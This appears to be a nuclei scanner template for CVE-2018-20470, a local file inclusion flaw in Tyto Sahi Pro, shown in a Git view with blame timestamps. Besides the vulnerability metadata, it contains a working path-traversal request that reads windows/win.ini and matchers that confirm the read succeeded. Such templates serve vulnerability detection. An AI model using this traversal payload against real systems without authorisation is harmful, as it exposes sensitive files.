nuclei-templates/cves/2018/CVE-2018-20470.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2021-08-02 23:19:42 +00:00
id: CVE-2018-20470
info:
name: Tyto Sahi pro 7.x/8.x - Local File Inclusion
2021-08-02 23:19:42 +00:00
author: daffainfo
severity: high
2022-06-20 16:20:58 +00:00
description: |
Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.
reference:
2021-08-02 23:19:42 +00:00
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-20470
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-20470
cwe-id: CWE-22
tags: cve,cve2018,lfi
2021-08-02 23:19:42 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and
matchers:
2022-06-20 16:20:58 +00:00
2021-08-02 23:19:42 +00:00
- type: word
2022-06-20 16:20:58 +00:00
part: body
2021-08-02 23:19:42 +00:00
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2022-06-20 16:20:58 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/17